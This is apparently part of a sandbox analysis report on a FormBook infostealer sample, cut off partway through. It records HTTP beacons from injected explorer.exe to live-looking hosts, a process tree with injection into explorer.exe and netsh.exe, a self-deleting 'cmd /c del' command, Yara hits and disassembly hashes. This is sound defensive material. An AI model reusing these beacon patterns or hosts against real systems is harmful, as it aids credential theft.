                        Data Ascii: pre.prettyprint .lit { color: #066 } /* a literal value */ /* punctuation, lisp open bracket, lisp close bracket */ pre.prettyprint .pun, pre.prettyprint .opn, pre.prettyprint .clo { color: #660 } pre.prettypr


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.6498013.64.163.5080C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Nov 25, 2021 15:11:41.436557055 CET15048OUTGET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1
                        Host: www.royaldears.com
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Nov 25, 2021 15:11:41.456082106 CET15049INHTTP/1.1 410 Gone
                        Server: openresty
                        Date: Thu, 25 Nov 2021 14:11:41 GMT
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 72 6f 79 61 6c 64 65 61 72 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 61 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 72 6f 79 61 6c 64 65 61 72 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='5; url=http://www.royaldears.com/' />a </head>9 <body>3a You are being redirected to http://www.royaldears.coma </body>8</html>0


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.649821142.252.22.16680C:\Windows\explorer.exe
                        TimestampkBytes transferredDirectionData
                        Nov 25, 2021 15:11:46.852530956 CET16564OUTGET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1
                        Host: www.dragonmodz.net
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Nov 25, 2021 15:11:47.031126976 CET16565INHTTP/1.1 200 OK
                        Server: nginx
                        Date: Thu, 25 Nov 2021 14:11:46 GMT
                        Content-Type: text/html
                        Content-Length: 1886
                        Connection: close
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 ba a3 b6 ab c3 c3 ba b1 c6 fb b3 b5 ce ac d0 de cd b6 d7 ca d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 38 33 3b 26 23 36 39 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 32 32 32 36 39 3b 26 23 33 35 38 32 31 3b 26 23 33 33 32 35 38 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 32 32 33 31 32 3b 26 23 34 34 3b 26 23 33 33 33 39 34 3b 26 23 33 39 33 32 31 3b 26 23 33 34 31 32 31 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 34 34 33 33 3b 26 23 33 35 32 37 30 3b 2c 26 23 32 33 35 34 35 3b 26 23 33 30 35 32 38 3b 26 23 33 38 32 33 36 3b 26 23 32 33 33 37 36 3b 26 23 32 31 35 31 38 3b 26 23 32 30 38 33 37 3b 26 23 32 33 35 36 37 3b 26 23 32 38 31 36 35 3b 26 23 32 36 30 33 32 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 38 33 3b 26 23 36 39 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 32 32 32 36 39 3b 26 23 33 35 38 32 31 3b 26 23 33 33 32 35 38 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 32 32 33 31 32 3b 26 23 34 34 3b 26 23 33 33 33 39 34 3b 26 23 33 39 33 32 31 3b 26 23 33 34 31 32 31 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 34 34 33 33 3b 26 23 33 35 32 37 30 3b 2c 26 23 32 33 35 34 35 3b 26 23 33 30 35 32 38 3b 26 23 33 38 32 33 36 3b 26 23 32 33 33 37 36 3b 26 23 32 31 35 31 38 3b 26 23 32 30 38 33 37 3b 26 23 32 33 35 36 37 3b 26 23 32 38 31 36 35 3b 26 23 32 36 30 33 32 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 38 33 3b 26 23 36 39 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 32 32 32 36 39 3b 26 23 33 35 38 32 31 3b 26 23 33 33 32 35 38 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 30 31 30 38 3b 26
                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20122;&#27954;&#31532;&#19968;&#83;&#69;&#24773;&#32593;&#31449;&#44;&#39640;&#28165;&#22269;&#35821;&#33258;&#20135;&#31934;&#21697;&#35270;&#39057;&#20108;&#21306;&#22312;&#44;&#33394;&#39321;&#34121;&#35270;&#39057;,&#20037;&#20037;&#22269;&#20135;&#31934;&#21697;&#22312;&#32447;&#24433;&#35270;,&#23545;&#30528;&#38236;&#23376;&#21518;&#20837;&#23567;&#28165;&#26032;&#22269;&#20135;&#31934;&#21697;</title><meta name="keywords" content="&#20122;&#27954;&#31532;&#19968;&#83;&#69;&#24773;&#32593;&#31449;&#44;&#39640;&#28165;&#22269;&#35821;&#33258;&#20135;&#31934;&#21697;&#35270;&#39057;&#20108;&#21306;&#22312;&#44;&#33394;&#39321;&#34121;&#35270;&#39057;,&#20037;&#20037;&#22269;&#20135;&#31934;&#21697;&#22312;&#32447;&#24433;&#35270;,&#23545;&#30528;&#38236;&#23376;&#21518;&#20837;&#23567;&#28165;&#26032;&#22269;&#20135;&#31934;&#21697;" /><meta name="description" content="&#20122;&#27954;&#31532;&#19968;&#83;&#69;&#24773;&#32593;&#31449;&#44;&#39640;&#28165;&#22269;&#35821;&#33258;&#20135;&#31934;&#21697;&#35270;&#39057;&#20108;&
                        Nov 25, 2021 15:11:47.031146049 CET16566INData Raw: 23 32 31 33 30 36 3b 26 23 32 32 33 31 32 3b 26 23 34 34 3b 26 23 33 33 33 39 34 3b 26 23 33 39 33 32 31 3b 26 23 33 34 31 32 31 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 32 32
                        Data Ascii: #21306;&#22312;&#44;&#33394;&#39321;&#34121;&#35270;&#39057;,&#20037;&#20037;&#22269;&#20135;&#31934;&#21697;&#22312;&#32447;&#24433;&#35270;,&#23545;&#30528;&#38236;&#23376;&#21518;&#20837;&#23567;&#28165;&#26032;&#22269;&#20135;&#31934;&#216


                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        Analysis Process: cK1g5gckZR9VHjj.exe PID: 7160 Parent PID: 6012

                        General

                        Start time:15:10:13
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
                        Imagebase:0x8e0000
                        File size:445440 bytes
                        MD5 hash:5F19B9A3E41EF2E6EC3200BF4A246CEC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        Chronological Activities

                        Analysis Process: cK1g5gckZR9VHjj.exe PID: 1312 Parent PID: 7160

                        General

                        Start time:15:10:16
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Imagebase:0x2f0000
                        File size:445440 bytes
                        MD5 hash:5F19B9A3E41EF2E6EC3200BF4A246CEC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        Chronological Activities

                        Analysis Process: cK1g5gckZR9VHjj.exe PID: 6104 Parent PID: 7160

                        General

                        Start time:15:10:18
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Imagebase:0x560000
                        File size:445440 bytes
                        MD5 hash:5F19B9A3E41EF2E6EC3200BF4A246CEC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        Chronological Activities

                        Analysis Process: explorer.exe PID: 3440 Parent PID: 6104

                        General

                        Start time:15:10:20
                        Start date:25/11/2021
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff6f22f0000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        Chronological Activities

                        Analysis Process: netsh.exe PID: 6904 Parent PID: 3440

                        General

                        Start time:15:10:53
                        Start date:25/11/2021
                        Path:C:\Windows\SysWOW64\netsh.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\netsh.exe
                        Imagebase:0x9e0000
                        File size:82944 bytes
                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        Chronological Activities

                        Analysis Process: cmd.exe PID: 6900 Parent PID: 6904

                        General

                        Start time:15:10:57
                        Start date:25/11/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
                        Imagebase:0x2a0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Analysis Process: conhost.exe PID: 6992 Parent PID: 6900

                        General

                        Start time:15:10:58
                        Start date:25/11/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff61de10000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Chronological Activities

                        Disassembly

                        Code Analysis

                        Reset < >

                          Analysis Process: cK1g5gckZR9VHjj.exe PID: 7160 Parent PID: 6012 cK1g5gckZR9VHjj.exeCOMMON

                          Executed Functions

                          Function 02B9D2F8, Relevance: 2.5, Strings: 1, Instructions: 1286COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.357185909.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: d
                          • API String ID: 0-2564639436
                          • Opcode ID: c7e8b8f9c2b491c0de9f5d3dffa899dd3a8c47c6477579237a1e2a54b3e14688
                          • Instruction ID: 4713bf8759925db837352df6f89cae297227f0876e634d3d3299b0cb6d8596cf
                          • Opcode Fuzzy Hash: c7e8b8f9c2b491c0de9f5d3dffa899dd3a8c47c6477579237a1e2a54b3e14688
                          • Instruction Fuzzy Hash: 55C23C74B002198FCB18EF69D555AA9B7B2FF89304F2184E9D90A9B395DB30DD81CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02B98250, Relevance: .6, Instructions: 566COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.357185909.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b1f4070886bb518445f618ca5fb664a69e20399b2f02ad7d34ebe1cfdd9d33f6
                          • Instruction ID: 2d23093bfb2aa96f32c68377603db557cafa955dff096f8d583e49032c971927
                          • Opcode Fuzzy Hash: b1f4070886bb518445f618ca5fb664a69e20399b2f02ad7d34ebe1cfdd9d33f6
                          • Instruction Fuzzy Hash: D422F031A042598FDF14EF74C4947BD7BB2EF86208F1988B9D8169B292DB34DC45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02B94497, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                          Download Yara Rule
                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 02B94522
                          Memory Dump Source
                          • Source File: 00000000.00000002.357185909.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: f39ec5d766cb96d67d6066cd47c9e33e4a57eb334ec618a5f86b79b8505b1c28
                          • Instruction ID: f93288b469d97f2d78b5484be064260b6a657b4a68ac706f93bb1aedd758b8d6
                          • Opcode Fuzzy Hash: f39ec5d766cb96d67d6066cd47c9e33e4a57eb334ec618a5f86b79b8505b1c28
                          • Instruction Fuzzy Hash: 192147B19102448FCF60DFA9D94839EBFF4EB59318F2488ADD409A2642D7799500CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02B94747, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 02B947CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.357185909.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: 755d7a0b83a0bbac5643fde6ebfc34a747a159d1926f643ffaab2240307b146b
                          • Instruction ID: 3dc93f4ff85aa774df0cbd819f12303c6934218e5cfd5ce4ab8545aef6439d2b
                          • Opcode Fuzzy Hash: 755d7a0b83a0bbac5643fde6ebfc34a747a159d1926f643ffaab2240307b146b
                          • Instruction Fuzzy Hash: B7215CB58103898FDF20DFA4D64839ABFF8EF09318F1449AAD455E3682DB399505CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02B944A8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                          Download Yara Rule
                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 02B94522
                          Memory Dump Source
                          • Source File: 00000000.00000002.357185909.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: 446aabb544884be7a6d28701a51ccb49f0398f5250dce02f240ac99cd6c7ee43
                          • Instruction ID: 258766319f5a15ff91c34ae8e9bc38dac8c07671606c28a3bc3afc6af9c93480
                          • Opcode Fuzzy Hash: 446aabb544884be7a6d28701a51ccb49f0398f5250dce02f240ac99cd6c7ee43
                          • Instruction Fuzzy Hash: 2C115C70A102458FCF20DF99D94879EBFF4FB49318F248869D405A3742D779A541CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02B94758, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                          Download Yara Rule
                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 02B947CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.357185909.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: 1e62ff61e330e2eb886906a3774ccda47288450377f75b2ba8e427ca2300aeba
                          • Instruction ID: b8ef5084d961354a4263095e200cb1e04937cfd23b5389fddb13b239bf045edf
                          • Opcode Fuzzy Hash: 1e62ff61e330e2eb886906a3774ccda47288450377f75b2ba8e427ca2300aeba
                          • Instruction Fuzzy Hash: 501197B48103888FDB20DF98D54879ABFF8EF08318F204869D415A3281CB79A505CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05386BC8, Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: ="
                          • API String ID: 0-1535570552
                          • Opcode ID: 9ee6c91923743541c161e0a1d21043f242fad12c436c7a7ed39234e4fc2fdeba
                          • Instruction ID: bf0721909f07706b14e28cba1fb752c5dc70d64c10f1bf49cb8ea72c517f8ecd
                          • Opcode Fuzzy Hash: 9ee6c91923743541c161e0a1d21043f242fad12c436c7a7ed39234e4fc2fdeba
                          • Instruction Fuzzy Hash: 6C41B1397142408FD709ABB4D81AB6D7FA2AF99311F15846AF406CB3D2DF758C468B11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05386F7D, Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: ="
                          • API String ID: 0-1535570552
                          • Opcode ID: db862cbb15ebca35c2930e597808072f2042aa3fb4e8463ef5839fb3a90b6389
                          • Instruction ID: 0ff9c82a63cfad670f523a1722d3f90d07f012a9eaf9ec0afd9c44c1dae3b328
                          • Opcode Fuzzy Hash: db862cbb15ebca35c2930e597808072f2042aa3fb4e8463ef5839fb3a90b6389
                          • Instruction Fuzzy Hash: DF01DB71204A15CAC72CD778D8432BAB3B6FB60394F008A22F157CA5C0D374D561C671
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0538F7C0, Relevance: .8, Instructions: 829COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f0aa93ef80d698b8180fb3f2c4baf986650e35e6230c6726a5d00e7b163935a
                          • Instruction ID: f2b97b3eaa05107ffbee9badb0715b00e4d40b19b7e3e6fa0cdd4b7352ff533a
                          • Opcode Fuzzy Hash: 8f0aa93ef80d698b8180fb3f2c4baf986650e35e6230c6726a5d00e7b163935a
                          • Instruction Fuzzy Hash: 7CA18A31B002199FCB19EFA4D894ABE77A7BF88314F148429E8169B394DB74DD42CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0538F5C0, Relevance: .2, Instructions: 184COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 646476348c846fe0383ab3e24843ef85c8c4ef05ec1cd1f08fac492ec1334d6b
                          • Instruction ID: df70b48ef8f71979d61f349dbd056a64981ad808af1bbe95ae6eb543be756b2d
                          • Opcode Fuzzy Hash: 646476348c846fe0383ab3e24843ef85c8c4ef05ec1cd1f08fac492ec1334d6b
                          • Instruction Fuzzy Hash: DE510331B047068FDF28EF78C984A7E7BB6BF85254F15456AE005D7261DB74E840C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0538F198, Relevance: .2, Instructions: 182COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f096cf23f9d92896ea2d222f4bb24afa1a35944e0c8e575ca7936d70b709e5ad
                          • Instruction ID: 4a006adbe9a7719184bd4cfb723cfdf61930a2b49742e968b886ad0a889eeeb3
